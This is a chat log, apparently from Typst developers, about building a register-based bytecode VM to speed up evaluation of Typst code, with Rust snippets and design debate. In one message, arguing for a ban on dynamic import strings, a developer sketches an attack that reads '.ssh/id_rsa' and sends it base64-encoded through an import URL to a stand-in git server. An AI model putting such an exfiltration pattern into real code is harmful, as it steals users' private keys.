#Performance
1 messages Β· Page 3 of 1
I'd love to π
As said, it's just a rough draft and the ideas are also far from final. I'm also not yet really 100% sold on the custom vtable thing, but it would definitely unlock some cool stuff.
Very nice read as well!
I'm wondering, is it always the best option to use span for memoization? or could we do that more subtly when needed for reasons?
I mean, what other information do we have access to at that stage? π€
Wouldn't Arc<(Hash, RestOfData)> already store the hash alongside the refcounts?
Call me foolish, but It's All Just One Instruction Anywayβ’, no?
Yeah, right. I was thinking of the other possible optimization where the header is in front of the pointer.
Perhaps, it doesn't make a real difference.
@left night I kinda want to work on the whole "bytecode" thing, would you be open to that?
I am definitely open to that. I also think that it would be a fun greenfield project with lots of stuff to experiment with.
greenfield?
I don't know what that means π
it's obviously not completely free from existing constraints, but it involves building lots of new free-standing stuff
Yes, I think I'll start with a fairly basic system that doesn't do any kind of smart checking (like validating args beforehand) to try and make it simpler, then grow the complexity (and performance) as I go along
what is the bytecode in typst?
it would replace eval with a new pre-compiled bytecode that would hopefully be much faster to evaluate as well as be more memoizable (by not having any spans and things like that)
So there is no bytecode in typst, and you want to make one.
yes
so this would only apply to any code that is evaluated with eval or all Typst code?
all typst code
eval in this case refers to the module inside of the typst source π
I was looking at the parallel test branch, but it is not get merged. https://github.com/typst/typst/commit/e0adfc1ded3dedde5f450eb1f0d0dd3cb37cd768
There are tests failed, but I don't know what the failure of that tests means. Could it fixed by some simple patches? What is absent caused failure in there? I don't know at all.
There are some stuff regarding introspection that just don't work yet on that branch π¦
@left night do you know where values are collected? Like joined into one big value for returning π€¨
Ah, I found it sorry for the ping
So my understanding is correctly, currently typst code is interpreted by walking through the tree basically, and you want to do something like in Oython where itβs first compiled to Bytecode and then the bytecode gets run instead?
yes, because as it turns out, eval is rather slow and happens very often
I seee
The goal being to make eval blazzing fast π and easier to understand (hopefully)
Sounds like a huge undertaking tho haha
Actually: not that much π
Would you generate your own bytecode language or are there libraries for that
Or how exactly
Because I just need to traverse the tree and generate OpCodes instead
And then eval the opcodes which is fairly simple
Icic
At present it can already do basic operations
Well keep us posted πͺ
mind you I am not compiling to bytecode yet
My goal is eventually to add (primitive) type checking in it (once we have type validation) and check whether variables, functions, etc. exist
Parallel layout requires a change to how locations are assigned, which breaks measurement. More details and a possible solution in my recent blog post: https://laurmaedje.github.io/posts/frozen-state/
Later on we might even be able to optimize the bytecode during eval, but that's wayyyyyy out of scope for my early prototype
@sturdy sequoia This is more fun than dealing with subtle bugs in the styling system, eh? π
yes π
The thing is that I don't understand all of the complexity of the styling system so I feel a bit dumb lmao
it might be a good idea to do a register based interpreter instead, while you are already rewriting the interpreter
that should increase the performance over a stack based vm
I must admit I am doing it stack based because it's easier and makes joining output easy: I just join the stack once I'm done π
That's literally how I'm handling producing the output and joining of values
and it's dead easy
I'll probably remove the Variable stack value mind you
I guess for joining with a register based vm, we would simply need a join instruction: JOIN accumulator, return_register
yes probably
how would you handle name and spread arguments tho?
My idea currently is that calling a function looks like this: Call(function_id, arg_count) and then I pop arg_count arguments and if they are NamedArgument or SpreadArgument I apply the proper behaviour
would you essentially do the same?
I'm just not sure I want to deal with the complexity of register based VM π
because (I think) it'll make the compilation much harder
great resource, thanks!
Hmmm, I see how that leads to a smaller eval indeed
It also has the advantage that we don't need to allocate like ever
Famous last words π
I said the same thing for gradients didnβt I?

You did xD
How are you hoping to achieve the big fast with such high-level abstractions
We need function signatures to simply not exist at evaltime
Oh god that means we will have two entirely distinct compilation passes
terminology is gonna aa
What font are you using?
comic code
Yes, function calls would still be a bit slow, but better than the current technique
I am now looking into the register-based system that @cunning wadi suggested and I wonder if I can use that to make it faster
But obviously, I will need to do a lot of testing and benchmarking to make it work
It can really be reduced to
- resolve all arguments against the function's signature
- compile down to 1 register per argument according to the function's signature, not the call site
- give function access to those registers
master race
yes but the problem is named and optional arguments
it's a bit tricky for those
mmnope
namedβnot any different, just have some canonical ordering
optionalβoptional is a call site privilege, simply substitute the value in the bytecode
though dynamic dispatch is harder.
@glossy shore my current design is as follows:
- The compiler builds a list of instructions (for which each has a span in a second array)
- The compiler also builds a list of constants (to avoid cloning and keep instructions copy)
- And a list of jump labels
- Then an
Executoris created which is very lightweight, containing a fixed-size array of register (initially allValue::None) - It executes each instruction one-by-one borrowing as much as possible (to avoid cloning)
My instruction set is around 23 instructions so far
I'm definitely missing some, for example you cannot build a dict or array at the moment, but I'll add that
Cannot do show-set rules either
But I'll work on that now
bytecode will be the road to jitπ€©
Each instruction is only 8 bytes which imo is perfectly fine
yesssss
yes. i also worry about that. jit/bytecode the "pure-compute" part is much easier
I still think that for now I'll handle arguments and variables as special values that are accessed with an ID
my goal is to turn them into instructions that are similar to function calls but have specific semantics
we'll see how that ends up working!
the hardest part will be building the compiler itself I think
Also possibility to browser side layout computing? If we can convert the bytecode, we can layout and produces frames by executing the bytecode dynamically in browser, without having to downloading entire 17mb compiler.wasm to client.
If the bytecode could be lowered to wasm, we can even use browser native wasm interpreter.
To lower the bytecode to wasm, it would need to operate on a very low-level basis. I think the planned implementation would continue using all of Typst's data structure and runtime infrastructure, meaning that layout is separate from it.
yes indeed, my goal is to make it easy-ish to turn set show labels, etc. into function calls but JIT is still wayy out of scope
We don't have to convert out a wasm in early stage.
My goal is a nice performance bump for now
Do you think it's a good idea to do the following:
- Recusirve decent in the tree, each nodes gets compile to an instruction but has a register that keeps increasing every time we need one
- Do a second pass once we have collected all of the instructions deduplicating them: essentially once a register is no longer used, mark it as "free" and give the next instruction that needs a register access to it
That's essentially a first recursive pass, followed by a second linear pass
note that currently locals are stored in a special local store and not in registers, same with arguments. Therefore only values that are not bound are ever stored in registers
@left night do assignments return a value in typst?
i believe they return None
Yes, so in my case they won't return anything
wdym?
well in my case, an assignment is just a single instruction
it won't store anything in any register
because where it's used will automatically and always be a none
yea but what if the function only has an assignment?
it will apply it and return None automatically
and what if the assignment is used in an expression?
it'll be None automatically
well no, the operator doesn't, it will just get automatically set to a None
Basically, register 0 is always a None
That way
well, if you ensure it behaves exactly as it does now, then i dont see a problem
Join 0 1 1
is easy to detect
My goal is to be able to remove useless assignments π
And useless ops that use a none
Not to criticise your work, but if CPUs can work with 4bytes max isn't that a lot?
That can just be the case whenever you can predict the value of an expression beforehand
Register re-mapping is implemented
π
now I just need to finish implementing the VM
and it should work?
how long do you think itll take? π
I honestly think it'll be faster than one might expect
I ended up being able to re-use a lot of the existing infrastructure so it's not too bad
What I mostly need to do is implement the VM, and optimize everything with IDs (which is already mostly the case, I just need to do it for scopes)
The one big thing missing right now is that you can't do any kind of scopes, there is only one scope: the global scope
However once I'm done, it'll be okay I think
I'm afraid it'll be zero lol
One of the big changes mind you is also that I'm turning it from a clone fest to a borrow fest
which should help reduce cloning a TON
And it should be able to much more agressively memoize compilation
How so? :(
I meant I am scared that it might be no gains
I don't know yet
I'm kind of stuck on closures π
Maybe itβll be worse π
Now that's just mean π
The main advantage is that it should cache much better, less instructions, etc.
I hope so too
it's a lot of work π
and it's nowhere near merge-quality code yet
You know I'd love to review help and document right?
Best meme of the year
pub struct CompiledClosure {
/// The span of the closure.
span: Span,
/// The instructions that make up the closure.
instructions: Vec<Instruction>,
/// The spans of the instructions.
spans: Vec<Span>,
/// The captured variables.
captures: Vec<Capture>,
/// The default values of the named parameters.
/// To be loaded into the closure's scope.
defaults: Vec<Register>,
/// The number of local variables.
locals: usize,
/// The constants of the closure.
constants: Vec<Value>,
/// The strings of the closure.
strings: Vec<String>,
/// The patterns of the closure.
patterns: Vec<Pattern>,
/// The closures of the closure.
closures: Vec<CompiledClosure>,
}
Now that's freaking fat
Thicc
About half of the instructions are implemented
If you improve the performance of the typst language, will that improve the performance of the compilation of documents?
massively yes
Is eval a big bottleneck?
not really. for oi-wiki, most eval time used is for wasm plugin: generating qrcode. and eval takes about 20%-30%
for smaller docs things may become different
also might be different for docs which make heavy use of scripting
but bytecode and jit is very very cool. i really want to see how it looks like
like tablex or cetz? maybe in these doc, eval takes a lot of time
I think a more nuanced answer than @onyx furnace's is:
it depends
If you use libraries like tablex or codly, have complex templates, or do any sort of compute? yes
oi-wiki is really special because it's bottlenecked by the wasmi runtime
but most docs I have seen (so far) did have quite a bit of compute and decreasing our reliance on this will definitely help
Will it 10x typst's perfs? no
Will it 2x them? maybe, depends on the document
Is anything that doesn't 10x performance even worth doing?
Clearly not π
Handwritten assembly or riot
... it kind of is π
it's indeed a hand-written assembly π
(well a decent chunk was written by ChatGPT π)
Inline assembly in rust?
no, but it's an assembly
and I wrote it by hand
so it's hand written assembly
Thanks yous for your answers!
Ok, so the compiler mostly works, the following code gets compiled into:
= Hello, world!
This is a more complex example.
#lorem(300)
Gets compiled to the following instructions:
consts: [ Space, Text("Hello, World!"), Text("This is a more complex example."), Parbreak, 300]
isrs: [
Set { register: Register(1), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(1), target: Register(0) },
Set { register: Register(2), value: ConstId(1) },
Join { lhs: Register(3), rhs: Register(2), target: Register(3) },
Heading { span: Span(1), level: 1, body: Register(3), target: Register(4) },
Join { lhs: Register(0), rhs: Register(4), target: Register(0) },
Set { register: Register(5), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(5), target: Register(0) },
Set { register: Register(6), value: ConstId(2) },
Join { lhs: Register(0), rhs: Register(6), target: Register(0) },
Set { register: Register(7), value: ConstId(3) },
Join { lhs: Register(0), rhs: Register(7), target: Register(0) },
LoadModule { module: ModuleId(0), local: LocalId(58), target: Register(8) },
Args { target: Register(9) },
Set { register: Register(10), value: ConstId(4) },
ArgsPush { args: Register(9), value: Register(10) },
Call { callee: Register(8), args: Register(9), target: Register(11), math: false, trailing_comma: false },
Join { lhs: Register(0), rhs: Register(11), target: Register(0) },
Set { register: Register(12), value: ConstId(0) },
Join { lhs: Register(0), rhs: Register(12), target: Register(0) }
]
What do y'all think?
(especially @left night @onyx furnace @tight glade @glossy shore and others that were interested like @sly pecan)
As you can see all names, etc. are completely removed instead using indices to try and make accesses much faster
Is control flow already supported?
It's funny to me that you think I would understand anything of this π
The only thing that are currently not supported:
- Show/Set rules
- Importing/Including modules
- Scoping, it currently only supports scoping for closures/functions but not blocks of code/content
Otherwise pretty much is implemented
show set rules I plan on supporting using a rule stack that changes the behaviour of the Join instruction because it's the easiest
And scoping is more about me being lazy π
how many registers do we have?
Currently 32, but I don't know how many we really need
you are surprisingly fast!
does the number of regs matter? I dont know about bytecode design but I feels like there is not a 1:1 mapping between logical regs and physical ones
And I think we also have a memory?(If we use up all the regs)
I mean yes because it's how much stack size and memory it will use
But apart from that, not really
I think they all are in memory. And we may not have to bind them to physical registers in initial impl.
It's unlikely we could because there's quite a bit of state in the VM atm in addition to the register themselves
the instructions are quite high level in order to reuse as much as possible
Would it be better if we have exactly 0 reg and only relies on stack? And we may do clever reg allocation things after we want to JIT/compile to native code.
pub struct Executor<'a> {
/// The instructions to execute.
instructions: &'a [Instruction],
/// The spans in the instruction set.
spans: &'a [Span],
/// The labels in the instruction set.
labels: &'a [usize],
/// The constants in the instruction set.
constants: &'a [Value],
/// The closures in the instruction set.
closures: &'a [CompiledClosure],
/// The strings in the instruction set.
strings: &'a [EcoString],
/// The scopes used in the instruction set.
scopes: Scopes<'a>,
/// The locals used in the instruction set.
locals: Vec<Value>,
/// The captured locals used in the instruction set.
captured: &'a [Value],
/// The arguments used in the instruction set.
arguments: &'a [Value],
/// The current register table.
registers: RegisterTable,
}
#[derive(Clone, Debug, PartialEq, Hash, Default)]
pub struct RegisterTable {
pub registers: [Value; REGISTER_COUNT as usize],
}
The idea of having registers instead of a stack is that it leads to less instructions and (hopefully) faster execution
Additionally, it makes the compiler insanely easy to write π
sounds like cisc vs riscπ
oh, it's a CISC π
Some instructions run a TON of code behind the scene lol
HISC
Especially closure initialization
humongous instruction set computer
there's only around 50 instructions π
But each instruction is 32 bytes
We may simply have infinite registers, and determine it then by the thesis. π
I think 32 should be fine π
maybe 64 but no more
note that currently locals are not stored in registers (which I admit is a bit weird)
My plan is to convert locals to registers soonβ’οΈ
But I'd like the whole thing to work and be debugged first
Make instructions having infinite registers brings benefits to static analysis. I don't know whether it introduces overhead to bytecode compiler.
to the compiler: no
currently the compiler actually uses infinite register then does a second pass to reuse registers and optimize
My goal with this is mostly to avoid using too much memory and to avoid allocating
but we could definitely do this but not put a hard-cap on the number of registers
Sounds good
Like optimizing without limiting to 32 registers
My goal is also (maybe) to have multiple sizes of register pages and depending on the function use a bigger or smaller one among multiple sizes
to try and be as cache and memory efficient as possible
We may also have comemo on executing blocks.
And using Defer<T> to send a sufficient big instructions batch to another thread to execute...
Like we could start by allocating 32 registers but grow as needed! I can take a deeper look this evening, where can i take a look at the implementation? β€οΈ
I haven't pushed it yet :-p
that's my plan indeed π
Many crazy optimization..
By the thesis is my new expression β€οΈ
Wait, are you going to write bytecode manually in source code? Or what is as needed in this sentence.
π¦
I want to see that now lol
The bytecode is being written manually by dherse now in typst code base yea
But typst users will never see it
@untold turret @onyx furnace I actually really like the idea of having a variable number of registers, because it also removes the need to distinguish between: locals, captured, and arguments as being "special" cases which simplifies everything
So I think that as soon as it all works, I'll be implementing that way π
If we don't target to utilize physical registers in "part 1", I think it is a really good decision. But I heard you had restricted it, so I thought the limiting registers is easy.
it's easy to limit them because a lot of values are not in registers but in special storages (like local variables, arguments, and captured values)
but if all of those need to be in registers, it makes the compilation much harder
because you'll need to reorder things just to make room
or have a stack
Would it make sense to compile content blocks to a special template instruction rather than a lot of set + join? That way we can allocate space for the sequence beforehand and have less overhead in joining and Arc::get_mut.
that's exactly what I am changing to π
I was already doing it because handling styles was basically impossible
The way it works is as follows:
- Each markup, block, etc. creates a join group, when in a join group, the Join instruction basically appends the value to the group (which is pre-allocated to a size close enough to the output)
- When a markup, block, etc. ends, it pops the join group saving it to a register (as one big content)
- Whenever a style rule is encountered, it does the same but pushes it into a
StyledEleminstead (so a special kind of join group).
If a join group is empty, it just produces an empty sequence elem, etc.
My idea is that we can therefore pre-allocate a lot, and then we can just build the sequence from the arrays (EcoVec) directly
Additionally, I have some smart to handle subsequent show and set rules where they get collected into a single Styles to try and save memory and decrease the depth of the finaly Content tree
I plan on writing a LOT of docs in the module to explain how it all works, as well as I have commented basically every line of the compiler
Because the VM is actually quite complex, but this complexity is really aimed at improving performance
I also need to make the compiler use TrackedMut<Compiler> that way I can just #[comemo::memoize] each block π
Do you mean each individual [..] and {..} block?
Not sure yet, but maybe
I might just have two functions one which isn't memoized and based on the size then decide which one to take
When a block has a lot of assignments, the mutable constraints will probably tank performance. If it's mostly pure, it could be okay.
Actually, I am not handling remote assignment and mutable methods yet π
Because it sounds... hard
What's remote assignment?
remote assignments = assignments in a parent scope
ah
Overall, I think caching less and smarter (not even every function call) might be more the way to go. Less hashing, lookup, constraint, and memory overhead
No, that would be impure
Thank you
'cause I was worried π
Then mutable assignments should be relatively easy
Just need a Scopes::enter and Scopes::exit call and then it's good π
did it grow from 8 bytes to 32 bytes?
π
I wonder why we have to load a module as a value? Couldn't that stay outside of runtime
perhaps, it'd be worthwhile to do more struct-of-arrays? a Vec<u8> with opcodes and then one supplemental maybe Vec<u32> for common index arguments and then something for rarer arguments. but it starts complicating things more.
By the way, I suspect import "..": * is gonna be a pain to implement
Right now the imported string can even be dynamic, but I'm thinking about forbidding that. For import, I think almost nobody uses it, but for include some people do. Not sure.
It's also a security concern should we allow some sort of URL imports: #1176122103355953162 message
And exactly how comemo-able is this bytecode?
cache locality will significantly improve then
Shouldn't all scoping just be resolved at comptime
That's only possible if the ".." is known then
I think given the different constraints we're under this would make sense, it's not like registers have any real advantage over stack / heap for us
I think int registers, string registers, array registers etc. could definitely be useful
we could also allocate it all at once beforehand
yes π Because some instructions contain a span, but it's useless so I plan on removing it
Indeed, I don't know yet how to do it π
I am thinking of compiling and evaluating on-the-fly and cross my fingers that it's enough
the bytecode is copy, it only contains numbers (pretty much)
ah right, that's indeed an issue, I might just forbid it for the time being
for include it's fine because I can just evaluate it at runtime (relying on comemo for fast compilation)
but letting import be dynamic is a big no-no
But like the execution of it
as its linear
I think that it makes sense to allow things like git repos and stuff like that, but my problem is more that packages might use it, and that's an even bigger no-no
but even if you allow a git repo, the URL should be static
my problem is that if the URL is dynamic (even if it's a git URL), you can exfiltrate arbitrary data via the URL
what exactly is the attack vector here?
let's assume typst is executed in your home dir, so the whole home dir becomes part of the project. Then you let id = read(".ssh/id_rsa"), and call import "my.git.server/" + base64(id).
The whole read ssh keys, embed them into the PDF in some invisible way and get the person to send you the PDF is imo not that big of a deal. but this here would be a pretty big attack surface imo.
Ok, I reduced instructions to 16 bytes
that's true
I still think it's a genuine attack vector and it makes me glad that we have proper path sanitization
But indeed, leaking stuff through URLs would be 100x worse
I brought it down to 12 bytes
and that's bigger than I'd like
but it's pretty good
what do you think of SOA for instructions (struct of arrays)?
I'm not too sure what you mean by that π€
I meant to ask for clarifications but then I forgot
like just having an array of u8 and decoding instructions on the fly?
yes I know, but I don't understand in the context of instructions
Ok, I found the culprit and it's now down to 8 bytes
That means that each cache line can contain 8 instructions, I'd argue that's about as good as it gets
In the context of instructions, I meant that opcodes are a separate array from arg1, from arg2 etc.
Since not every instruction has the same structure, it would require some cleverness
But 8 bytes is pretty good
I think so too
I kind of want to keep it reasonably simple for when I have to debug it π
BTW @left night how can I chain two Styles
As in, I already have a style and I want to add one more
(some cleverness to avoid nested StyledElem)
@atomic violet isn't this stuff more like your speed?
content.styled(..) will do this flattening automatically. it is based on Styles::apply.
I mean I do care for one reason: that's the only place where I'm allocating in the vm
And I want to keep allocations to the bare minimum if I can avoid it
But of course we can revisit it once it actually work
Only things missing now are import, include and a few instructions like the ability to store in remote contexts, and the ability to run iterators (for x in y)
for which the instructions are there, they're just not implemented
Amazing. Atleast someone is dedicating their weekend to typst. A hero amongst mortals.
Oh, and destructuring values is not yet implemented either!
I retract my praise then.
It might be, but I have done dug into typst deep enough to contribute anything at the moment π
That's probably equivalent to elegantly change the meaning of a few Registers π
Which is hella cute
I have done it like this:
destructuring takes a pattern, the pattern indicates in which locals to store values
pretty rudimentary atm
If the values are already stored somewhere we can just change which register is pointing to it right?
ackshually, I have a question, what does Join do?
it joins values into a bigger values
it's the joining mechanism in typst
like joining multiple pieces of content into one big content
I guessed that much, but what does it do in the inside? Like create a tree node, or push to a vector of things to join, or ...?
push a vector of things
but it has the concept of a context, which is a vector of vector to handle nested joining
why is it signature so weird then? shouldn't it only have "where to push" and "what to push" arguments? Like lhs += rhs instead of target = lhs + rhs?
yes, before it didn't have that feature
now it would just be Push(capacity), Join(what_to_add), Pop(where_to_store)
/// Push a new join group
JoinGroup {
/// The capacity hint of the join group.
capacity: u16,
},
/// Pop a join group
PopGroup {
// The register in which to store the result.
target: Register,
},
/// Join two values.
Join {
/// The value to add to the join group.
value: Register,
},
ah, i see, that makes more sense
yes, styles are also just special join groups that carry a style
styles = show and set rules
I've tried to make things fairly simple and clever
but there ends up being quite a few moving parts
But I think it's okay
Because I'm trying to reuse as much of the existing logic as possible, most notably all of the ops::... like ops::add(rhs, lhs) that already exist in the code base
@left night do we want to keep this feature:
if let Some(sink_name) = sink_name {
if let Some(sink_pos_values) = sink_pos_values {
remaining_args.items.extend(sink_pos_values);
}
vm.define(sink_name, remaining_args);
}
If a sink is unnamed, the other arguments get defined as variables in the scope
This feels very error prone?
And is basically completely incompatible with my design π¦
yes, but is there feature useful in any way outside of that bug?
uh
well
the idea is that you should be able to take any args without caring about them
that's all
For now I'll just treat .. as "discard everything else"
yes figures, because it defines the variables which is super weird
what's the issue?
only if it's named though
ah no
okay
my bad
I had misunderstood the code, it was a bit confusing with the if let Some(..) = .. everywhere π
ok, so it's the right way π
but yeah you can just throw it all away
Sorry to say, but...
it's...
kind of the point π
throwing all of the eval code into a volcano π
π

Question, when we want to change the evaluation , will we have to work with your new bytecode already or is there some level of abstraction?
Like, is the eval trait still a thing? Does it returns bytecode now?
Now there is the Compile trait which receives the &mut Compiler as an argument, it must produce all of the instructions (with spans) in there (I will make a nicer functional API once it all works) and return a SourceResult<Register> the Register being where the output of that operation is stored.
Note that the output may very well be Register::NONE in which case it means it returns nothing
As an example:
impl Compile for ast::MathPrimes<'_> {
fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
let value = compiler.const_(
PrimesElem::new(self.count()).pack().spanned(self.span()).into_value(),
);
let register = compiler.reg();
compiler.spans.push(self.span());
compiler.instructions.push(Instruction::Set { value, register });
Ok(register)
}
}
Here is how ' in an equation gets compiled
later on, I plan on remplacing the manual span and instruction push with:
compiler.set(self.span(), value, register);
Which I think will be much nicer
Same with removing the .into_value() by making const_ take an impl IntoValue instead
Which would lead to:
impl Compile for ast::MathPrimes<'_> {
fn compile(&self, compiler: &mut Compiler) -> SourceResult<Register> {
let value = compiler.const_(
PrimesElem::new(self.count()).pack().spanned(self.span()),
);
let register = compiler.reg();
compiler.set(self.span(), value, register);
Ok(register)
}
}
Obviously some stuff like loops are much harder to do, but I plan on creating a nice-ish API for branching as well
Now here are the updated items missing:
- Destructuring (the instruction exists but is not implemented)
- Iteration (the instruction exists but is not implemented)
- Import and include of other files
This means that I should be able to start compiling simple docs!!!!
IT WORKS BABYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
I AM SO FREAKING GOOD
GODDAMN
@left night 
now do your thesis
can't yet
missing modules and closures don't work for some reason
skill issue
There's still Sunday.
It's just so absurd to have a jit for a typesetting language. I just can't fathom this.
Not a jit but whatever this is.
it's not a JIT, it's a bytecode based VM
if you think of typst more as a jupyter alternative where you can build your visualizations (graphs, etc.) directly in, then I think it makes perfect sense
But tomorrow I won't have time to work on it
and it'll likely have to wait until next w-e
Another blanket shall be delivered. Good work!
a jit would be fun though
and maybe even doable with cranelift as a pure rust dependency
lovely!
nice
niiiiiiiiiiiiice
What do you think of naming that compile trait ByteCode instead? (yes I love bikeshedding :p)
I actually think we should change the nomenclature in the rest of typst to refer to compiling the document as typeset, compiling the modules as⦠compiling, and evaluating the code as evaluation
I think it overall makes more sense
compiling the module into what? modules? π€£
but the CLI command is typst compile. do you want to change that to typst typeset too?
and the thing is called the compiler of the Typst typesetting language
no, change that
but the function internally is called typeset
well yea i guess Compile could be a bit generic perhaps
maybe ByteCodeCompile?
or VmCompile
eewww way too long π
yea
ByteCode on its own is probably a better idea than ByteCodeCompile
though VmCompile doesn't sound that bad either
Come on just ByteCode :p
less cool π
but that'd be inconsistent too
fn typeset(
world: Tracked<dyn World + '_>,
tracer: &mut Tracer,
content: &Content,
) -> SourceResult<Document> {
I mean you wrote it π
well yes
I thought you wanted to rename the public compile function
now we have
compile -> eval -> typeset -> export internally
no no I meant internally
I'm not sure I follow. Would you rename any of the existing functions?
no
I am just defending the Compile name for the trait
π
Thanks β€οΈ
I would probably also have called it that
But I guess I also have named both Trace and Tracer which are completely unrelated.
on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's check command?
because regarding performance I have found that going back to cargo check makes my IDE much more performant.
a bit unfortunate that I have to call cargo clippy manually now to ensure that CI will pass
are you using auto-save?
which is why I'm actually saving less and more after having done a batch of changes
I think I use check but not sure
did you test in on typst recently?
I did not, let me check
it's a little slower since the two main crates were merged
the diagnostics also come step by step. when doing a larger refactor, I can see folder by folder getting red
as mentioned before, for me (in VS Code) diagnostics completely disappear when saving and only come back once the new ones are available (even the unchanged ones). which is a bit of a pain.
typst bikeshed
typst t shorthand could also mean test I just noticed and, in fact, test is a subword of typeset.
for some definition of subword
I should also add that it differs. if the project has currently many errors, it takes longer, closer to 15s maybe. if it's in a compiling state, closer to 5s.
it's 2-6s for me
and I've been running a program for a few hours now that constantly takes up two threads
might just be the processor though
I must admit that I haven't actually measured. I just know that it feels pretty slow at times. But I think the worst times might have been on battery rather than plugged in.
But even though M1 is impressive, your desktop might also just be faster.
yeah, it's probably that
(after mainly using the work laptop for a while I definitely do notice the improved performance, even when just navigating in the editor)
(though that one has got an eighth gen low powered intel processor, so, not exactly the most powerful device on the market)
The difference between desktop cpu and a laptop one is that the desktop one can operate at max power for an extended period of time
Laptop ones cannot for thermal reasons
yeah
yes but incremental compilation and autocomplete are very bursty loads
so the difference in continuous TDP shouldn't matter that much
when I write pointer-code, unsafe code, clippy is too much anyways, and will fail code that builds/compiles. I'd use cargo check as r-a check command as a standard..
that sounds like the unsafe code might be doing things it should not be doing
I'm happy to say I fixed closures!
= Hello, world!
#set text(fill: red)
The lazy fox jumped over the brown dog.
#let call_once(fn) = { (fn)(100) }
#call_once(lorem)
This for example can already compile π
So it's really getting there! π
lovely π
Ok, I found a very sneaky bug with register remapping, I'm pretty sure it's correct now π
(basically I could remap the output register without re-assigning it)
Ok so I'm having issues with captured values in closures, I'll try and figure it out tomorrow
@left night How are # before a value rejected normally? Because from what I can tell it should be at the lexer level? But for some reason it's allowing it in code mode π
ah no okay I need to extract the errors separately my bad
I fixed closure scopes and captured values π
And now I fixed scopes during eval
Thesis when
soonβ’οΈ
We can now iterate over values π
only missing now:
- destructuring
- modules
destructuring ought to be easy
yes, I just need to adapt the old code π
modules won't be too hard either imo
I have a pretty good idea of how to implement them relatively easily
Doing so good @sturdy sequoia
Without taking runtime imports, I presume
Indeed, runtime import just won't be supported
good.
Why specifically?
I think it's error prone but I'm curious what you think π
yeah mostly error prone
mhm
(for now at least)
module imports just feel like they should be analogous to Rust use
if I write if cond { import "mod.typ"; } what's the scope of the import? Just the conditional?
Right now i'll be just the conditional yeah
is that already the case?
Sorry , what does "runtime import" mean here?
As in being able to conditionally import?
Or being able to provide a "dynamic string" to imports
dynamic string is what I meant
dynamic strings
you will still be able to conditionally import
If you finish today, and it changes performance by +-20% on thesis, we'll need to go on voice chat and celebrate/rant.....................
10x slower
I mean, just destructuring
then debugging

Destructuring is in
Destructuring works π
For those wondering, without the doc (there is some but very sparse), the compiler and executors are close to 6k lines long

Poor @left night
With the doc and cleanup it'll likely be in the neighborhood of 10k lines
π
The first ever document compiled with the new eval
Ok so it's very picky about failing to remap registers
π
= Hello, world!
#show "Lorem": text(fill: red, "Lo")
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
This uses too many registers π
I figured out why
It's 450 times slower π
Probably because of compilation lol
IT'S FASTER
@feral imp @sly pecan IT IS FASTER
thank god.
(I had forgotten to memoize closure calls π)
we were literarly holding our breath.
Now onto fix the bug so that I can test it on masterproef π
imagine running lorem(30) 5 times
I could have told you to do that π€£ /s /s /s
scare away typsters with this simple trick
I'm running fibonacci(30)
oh, a piece of code that didn't compile lol
ohok
I think tonight masterproef will compile using the new compiler π
famous last words
For 10k loc I bet laurmaedje needs it to be a bit fast.
I mean it replaces about 3k loc
Ok, it's a lot less than I thought
im more impressed that you did this in like a few days
:p
i dont have that much free time π
THERE ARE NO MORE todo!()
I mean there are bugs, I am now fixing the tests π
Actually most of the failed tests are just slight span differences
waiting intensifies for Goossa; Will typst performance exceed what Man has yet to witness?
@sturdy sequoia have you already submitted your thesis or is optimizing Typst just part of your procrastination? xD
I got 18/20 on my thesis :-p
ok haha nice π
We are waaaaiting..
IIUC It can't compile the thesis yet
I mean
But maybe today? :p
Dherse stands to his words except when it comes to gradients
Well "tonight" has just started in their timezone I believe
So let's give Dherse some time π
Shouldn't the output be identical?
my compiler generally takes bigger spans at the moment
but I'll work on improving it!
I don't know what a span is, but good job!
I love seeing everyone so invested in your work Dherse πβ€οΈ
it's a good investment
A Span is basically an ID to somewhere in the (typst) source
So what does having bigger spans mean?
It means it globs more of your code
so instead of this it might be this. that gets globbed
obviously not great but I plan on improving upon that later
Does it have consequence for the actual output?
no
but it might affect preview <-> source click (in the webapp)
and it makes most tests fail
I don't know yet, I am tracking down two bugs that prevent me from compiling it
and I took a long break
Ok so there's still something wrong with scopes
and methods will be the death of me
they're parsed so... weirdly
time to.. rewrite typst?
rewrite it in Zig
Ok so, doing register optimization S-U-C-K-S
I am going for another method of re-using registers
I'm happy to say that this new method shaved a good 2k lines from the total
I quite like it. I like using https://godbolt.org/ to see how tight my loops are. But itβs probably more useful for micro-controllers. I have no idea what itβs like on big-boy systems.
i think they're talking about registers in their VM
Oh boy. β¦ that some new sort of fun. But wouldnβt that technically be cacheβd vs register. I suppose it depends on the host system.
no no
I am building a typst VM for faster eval
and it uses registers
π
So it uses custom instructions and virtual registersβ¦. And youβre working on jit optimization? β¦ mostly guessing. How wide are the registers, how many are used?
This does not include a JIT
Register optimization is simply the process of choosing the best registers so that as little moves or interactions with the stack as possible have to occur
It's 32 registers. Their width I don't know
But the registers aren't simply 64 bit numbers like in hardware, but complex values
At least I assume as much
Wouldnβt that need to assume the most common instructions/stack operations?
Considering it's a very specific workload it wouldn't really be guessing per se?
It just needs to check things like whether the value of one register is still being required
Exactly, but before I was doing in a post-process pass, but I realized that I can just do it as I go which is much faster and easier
Or it could determine that one register should be used for something else instead and the existing value can simply be dropped onto the stack in the meantime
Faster easier == better solution
*footnote: it also causes all system files to be instantly deleted
Mind you, we don't have a stack
I mean we have more than one
but they're for very specific situations
for example we have an iterator stack to store rust native iterators in loops
since typst doesn't have iterators
What happens when a function is called?
Where does the context of the calling function end up
it copies all of the captured values into the function's scope, same with the args, then spins up a new VM
the reason why it spins up a new VM is because the calls get memoized
and the VMs are dirt cheap to initialize since they mostly borrow values
Huh
So it's not as fast as possible but that isn't the goal either
Do the arguments not end up in specific registers but instead some special value then?
they end up in a list of arguments, and the functions gets them one-by-one into registers
I plan on replacing locals and args with registers but I haven't done it yet
Not an option I usually have access to. But I like it.
What happens if a function takes more than 32 arguments?
Again, it's not a VM in the traditional sense, it's a VM like the Java VM
yeah then you'd be out of registers π
There is no stack π
Mind you you can call a function with more than 32 args
does it blow up Typst then?
crash and burn?
Is a dictionary one argument?
no, it just works
I don't understand the question
Where do the excess arguments end up?
